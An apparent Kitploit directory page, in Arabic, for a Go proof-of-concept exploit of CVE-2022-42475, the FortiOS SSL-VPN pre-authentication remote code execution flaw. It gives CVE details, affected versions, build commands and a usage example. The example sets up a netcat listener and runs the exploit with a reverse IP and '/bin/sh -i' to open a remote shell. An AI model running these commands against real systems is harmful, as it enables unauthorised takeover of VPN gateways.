Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2022-42475-poc — إثبات المفهوم (PoC) لأغراض البحث والتحقق المخبري المتحكم به من CVE-2022-42475، وهي ثغرة أمنية حرجة من نوع تجاوز سعة المخزن المؤقت في الكومة (heap-based buffer overflow) تؤثر على خدمة SSL-VPN في إصدارات معينة من FortiOS. | Kitploit
أدوات/GitHubGitHub/ull0a/cve-2022-42475-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubull0a/cve-2022-42475-poc

cve-2022-42475-poc

إثبات المفهوم (PoC) لأغراض البحث والتحقق المخبري المتحكم به من CVE-2022-42475، وهي ثغرة أمنية حرجة من نوع تجاوز سعة المخزن المؤقت في الكومة (heap-based buffer overflow) تؤثر على خدمة SSL-VPN في إصدارات معينة من FortiOS.

عرض المستودع
1منذ 6س 29دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-42475 PoC

تنفيذ تعليمات برمجية عن بُعد قبل المصادقة في Fortinet SSL VPN

الوصف

CVE-2022-42475 هي ثغرة أمنية من نوع تجاوز سعة المخزن المؤقت المستند إلى الكومة (heap-based buffer overflow) في خدمة SSL VPN الخاصة بـ FortiOS، وتسمح للمهاجمين غير المصادَق عليهم بتنفيذ تعليمات برمجية عشوائية عن بُعد (RCE) عبر طلبات HTTP مصممة خصيصًا موجهة إلى نقطة النهاية /remote/error.

تم استغلال هذه الثغرة بنشاط في البيئة الفعلية (0-day) قبل إصدار التصحيح الرسمي.

تنفيذ PoC

تُظهر اللقطة التالية تنفيذ الـ PoC في بيئة مختبرية مُصرَّح بها:

يُظهر المخرَج تنفيذ الـ PoC والتفاعل مع مثيل FortiOS المستخدم في الاختبارات.

تنفيذ الـ PoC

معلومات CVE

الحقلالقيمة
CVE IDCVE-2022-42475
CVSS 3.19.3 (حرجة)
المتجهCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-122
تاريخ الاكتشافديسمبر 2022
التصحيح الرسميFortiOS 7.2.3, 7.0.9, 6.4.11, 6.2.12, 6.0.16

الإصدارات المتأثرة

  • FortiOS 7.2.0–7.2.2
  • FortiOS 7.0.0–7.0.8
  • FortiOS 6.4.0–6.4.10
  • FortiOS 6.2.0–6.2.11
  • FortiOS 6.0.0–6.0.15
  • FortiOS 5.6.0–5.6.14
  • FortiOS 5.4.0–5.4.13
  • FortiOS 5.2.0–5.2.15
  • FortiOS 5.0.0–5.0.14

المتطلبات

  • Go 1.18+ (لتجميع الـ PoC)
  • وصول شبكي إلى الهدف على المنفذ 443 (أو منفذ SSL VPN المكوَّن)
  • بيئة مختبرية مُصرَّح بها لإجراء الاختبارات

التجميع

root@kitploit:~
# استنساخ أو تنزيل الكود المصدري
git clone https://github.com/uLl0a/cve-2022-42475-poc
cd cve-2022-42475-poc

# التجميع
go build -o exploit exploit.go

# أو التنفيذ مباشرة
go run exploit.go <target> <port> <reverse_ip> <params>

الاستخدام

root@kitploit:~
./exploit <target_host> <target_port> <reverse_ip> <param1> [param2...]

مثال

root@kitploit:~
# على جهاز المهاجم، ابدأ مستمعًا
nc -lvnp 80

# نفّذ الأداة الاستغلالية
./exploit 192.168.1.100 443 10.0.0.5 /bin/sh -i
تنزيل الأداة